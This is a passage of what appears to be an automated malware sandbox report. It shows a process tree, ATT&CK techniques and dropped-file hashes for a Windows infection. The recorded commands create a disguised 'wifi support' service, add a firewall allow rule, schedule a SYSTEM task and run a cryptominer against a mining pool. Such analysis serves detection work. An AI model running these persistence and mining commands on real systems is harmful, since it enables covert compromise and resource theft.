                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4340
                                                                                      • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                        C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:6088
                                                                                        • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                          C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:4836
                                                                                      • C:\Users\Admin\AppData\Roaming\uvujsjv
                                                                                        C:\Users\Admin\AppData\Roaming\uvujsjv
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:4232
                                                                                      • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                        C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2612
                                                                                        • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                          C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:3396
                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\AotYqZ\AotYqZ.dll",AotYqZ
                                                                                        2⤵
                                                                                        • Windows security modification
                                                                                        • Drops file in System32 directory
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:5172
                                                                                      • C:\Users\Admin\AppData\Roaming\uvujsjv
                                                                                        C:\Users\Admin\AppData\Roaming\uvujsjv
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks SCSI registry key(s)
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:1756
                                                                                      • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                        C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:2228
                                                                                        • C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                          C:\Users\Admin\AppData\Roaming\dvujsjv
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:1804
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                      1⤵
                                                                                        PID:1008
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:192
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:2188
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        1⤵
                                                                                          PID:4464
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4576
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:4772
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:5224
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies registry class
                                                                                          PID:5260
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:5388
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          PID:4028
                                                                                        • C:\Users\Admin\AppData\Local\Temp\75F.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\75F.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops startup file
                                                                                          • NTFS ADS
                                                                                          PID:5612
                                                                                        • C:\Users\Admin\AppData\Local\Temp\E84.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\E84.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:4920
                                                                                        • C:\Users\Admin\AppData\Local\Temp\157A.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\157A.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5396
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ktczdand\
                                                                                            2⤵
                                                                                              PID:3112
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\anzwpchr.exe" C:\Windows\SysWOW64\ktczdand\
                                                                                              2⤵
                                                                                                PID:5680
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                "C:\Windows\System32\sc.exe" create ktczdand binPath= "C:\Windows\SysWOW64\ktczdand\anzwpchr.exe /d\"C:\Users\Admin\AppData\Local\Temp\157A.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                2⤵
                                                                                                  PID:4104
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  "C:\Windows\System32\sc.exe" description ktczdand "wifi internet conection"
                                                                                                  2⤵
                                                                                                    PID:5944
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    "C:\Windows\System32\sc.exe" start ktczdand
                                                                                                    2⤵
                                                                                                      PID:1368
                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                      2⤵
                                                                                                        PID:5920
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5560
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1953.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\1953.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4308
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\201B.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\201B.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5692
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\27AD.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\27AD.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2564
                                                                                                      • C:\Windows\SysWOW64\makecab.exe
                                                                                                        "C:\Windows\System32\makecab.exe"
                                                                                                        2⤵
                                                                                                          PID:188
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c iqNOHdjFJRyhysPKrZOyDFL & okDksJPSlGbcVRHiSeznxx & hAaVTUKoBgyGcM & gqwjrmT & cmd < Estate.wms
                                                                                                          2⤵
                                                                                                            PID:4752
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd
                                                                                                              3⤵
                                                                                                                PID:6100
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr /V /R "^IRYjqEeSlHqUOmgNEQyuRToTmXianaMtsAbasYwuofIOxmdrAdyKMFuPItNebJxSVVDheWcGOYXClxmZHrSojeaLxIJhlZImVQSnVewEUmVNHEEgENczQjFTDRTzjocPdnGzBwrEwghMuFtPrc$" Tele.wms
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1192
                                                                                                                • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                                                                                  Diritto.exe.com o
                                                                                                                  4⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2208
                                                                                                                  • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com
                                                                                                                    C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\Diritto.exe.com o
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4600
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      schtasks.exe /create /tn "xNBSMJllYe" /tr "C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\xNBSMJllYe.exe.com C:\\Users\\Admin\\AppData\\Roaming\\gXjmjGiawO\\Q" /sc onstart /F /RU SYSTEM
                                                                                                                      6⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:5256
                                                                                                                    • C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\PjaGjBjjgOVdKYNVYmnWuQlkcROabisQzuDJBhnHgwRSAcsfjygDwWgZwukcMTPubtXEctxLwRHtY\RegAsm.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3412
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping 127.0.0.1 -n 30
                                                                                                                  4⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:1472
                                                                                                          • C:\Windows\SysWOW64\ktczdand\anzwpchr.exe
                                                                                                            C:\Windows\SysWOW64\ktczdand\anzwpchr.exe /d"C:\Users\Admin\AppData\Local\Temp\157A.exe"
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4904
                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                              svchost.exe
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:4112
                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                                                3⤵
                                                                                                                  PID:4196
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4796
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:5084
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:3796
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:6096
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:4248
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe
                                                                                                                      1⤵
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:5832
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:5140
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:4012
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:2712
                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                          1⤵
                                                                                                                            PID:3012
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                            1⤵
                                                                                                                              PID:5596
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BEE1.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BEE1.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:1444
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BEE1.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\BEE1.exe"
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1812
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:1536
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:4264
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:3132
                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  PID:2028
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:1620
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:1572
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2508
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 2508 -s 1848
                                                                                                                                    2⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:688
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\39F3.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\39F3.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:4964
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:4688
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EE40.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\EE40.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:96

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                  Execution

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Persistence

                                                                                                                                  New Service

                                                                                                                                  1
                                                                                                                                  T1050

                                                                                                                                  Modify Existing Service

                                                                                                                                  1
                                                                                                                                  T1031

                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                  2
                                                                                                                                  T1060

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  BITS Jobs

                                                                                                                                  1
                                                                                                                                  T1197

                                                                                                                                  Privilege Escalation

                                                                                                                                  New Service

                                                                                                                                  1
                                                                                                                                  T1050

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Defense Evasion

                                                                                                                                  Disabling Security Tools

                                                                                                                                  2
                                                                                                                                  T1089

                                                                                                                                  Modify Registry

                                                                                                                                  6
                                                                                                                                  T1112

                                                                                                                                  BITS Jobs

                                                                                                                                  1
                                                                                                                                  T1197

                                                                                                                                  Install Root Certificate

                                                                                                                                  1
                                                                                                                                  T1130

                                                                                                                                  Credential Access

                                                                                                                                  Credentials in Files

                                                                                                                                  4
                                                                                                                                  T1081

                                                                                                                                  Discovery

                                                                                                                                  Software Discovery

                                                                                                                                  1
                                                                                                                                  T1518

                                                                                                                                  Query Registry

                                                                                                                                  4
                                                                                                                                  T1012

                                                                                                                                  System Information Discovery

                                                                                                                                  5
                                                                                                                                  T1082

                                                                                                                                  Security Software Discovery

                                                                                                                                  1
                                                                                                                                  T1063

                                                                                                                                  Peripheral Device Discovery

                                                                                                                                  1
                                                                                                                                  T1120

                                                                                                                                  Remote System Discovery

                                                                                                                                  1
                                                                                                                                  T1018

                                                                                                                                  Collection

                                                                                                                                  Data from Local System

                                                                                                                                  4
                                                                                                                                  T1005

                                                                                                                                  Command and Control

                                                                                                                                  Web Service

                                                                                                                                  1
                                                                                                                                  T1102

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                    MD5

                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                    SHA1

                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                    SHA256

                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                    SHA512

                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                    MD5

                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                    SHA1

                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                    SHA256

                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                    SHA512

                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                  • C:\Program Files\Windows Security\TADMBRKVTW\ultramediaburner.exe
                                                                                                                                    MD5

                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                    SHA1

                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                    SHA256

                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                    SHA512

                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                  • C:\Program Files\Windows Security\TADMBRKVTW\ultramediaburner.exe
                                                                                                                                    MD5

                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                    SHA1

                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                    SHA256

                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                    SHA512

                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                    MD5

                                                                                                                                    806c3221a013fec9530762750556c332

                                                                                                                                    SHA1

                                                                                                                                    36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                    SHA256

                                                                                                                                    9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                    SHA512

                                                                                                                                    56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                    MD5

                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                    SHA1

                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                    SHA256

                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                    SHA512

                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                  • C:\ProgramData\3239418.exe
                                                                                                                                    MD5

                                                                                                                                    055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                    SHA1

                                                                                                                                    9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                    SHA256

                                                                                                                                    03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                    SHA512

                                                                                                                                    914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                  • C:\ProgramData\3239418.exe
                                                                                                                                    MD5

                                                                                                                                    055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                    SHA1

                                                                                                                                    9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                    SHA256

                                                                                                                                    03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                    SHA512

                                                                                                                                    914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                    MD5

                                                                                                                                    055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                    SHA1

                                                                                                                                    9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                    SHA256

                                                                                                                                    03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                    SHA512

                                                                                                                                    914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                    MD5

                                                                                                                                    055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                    SHA1

                                                                                                                                    9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                    SHA256

                                                                                                                                    03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                    SHA512

                                                                                                                                    914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                  • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\VG6DUBC0.cookie
                                                                                                                                    MD5

                                                                                                                                    ff94f1e0068a819120f6ba8a319ea47f

                                                                                                                                    SHA1

                                                                                                                                    709087b248436258c8c287ea594e4e9c45e42091

                                                                                                                                    SHA256

                                                                                                                                    122bd237614d554fba4c90fe3ff6c270d053ca1590ae8220e9669c54e14eb34c

                                                                                                                                    SHA512

                                                                                                                                    ee6d8b1688492fe2cf5b364ed2078ac9919ac879a03d07d181ed04e39ae482985df47e978cb2e8bdcedc4f206e0bf1c9d230ff6706784aad98466c9f31574305

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\14-38362-2d2-dc8b7-7a76321151ba4\Janimiwaba.exe
                                                                                                                                    MD5

                                                                                                                                    2304be32b9b1849493336fd90859ba95

                                                                                                                                    SHA1

                                                                                                                                    6f882e043e752e01d908bedd40ee86119829dab4

                                                                                                                                    SHA256

                                                                                                                                    75c16d010900e779b9ec46bcbe410d315c416f4ae9f1325180eaff82eb74be5e

                                                                                                                                    SHA512

                                                                                                                                    c76aef6da42442edb1984eda9a10ee7c377f5f5c9684cd02d903868642462165f8e58c1c24ad592f879679416f4335166d36fa3fe52903423bea9f124678ff70

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\14-38362-2d2-dc8b7-7a76321151ba4\Janimiwaba.exe
                                                                                                                                    MD5

                                                                                                                                    2304be32b9b1849493336fd90859ba95

                                                                                                                                    SHA1

                                                                                                                                    6f882e043e752e01d908bedd40ee86119829dab4

                                                                                                                                    SHA256

                                                                                                                                    75c16d010900e779b9ec46bcbe410d315c416f4ae9f1325180eaff82eb74be5e

                                                                                                                                    SHA512

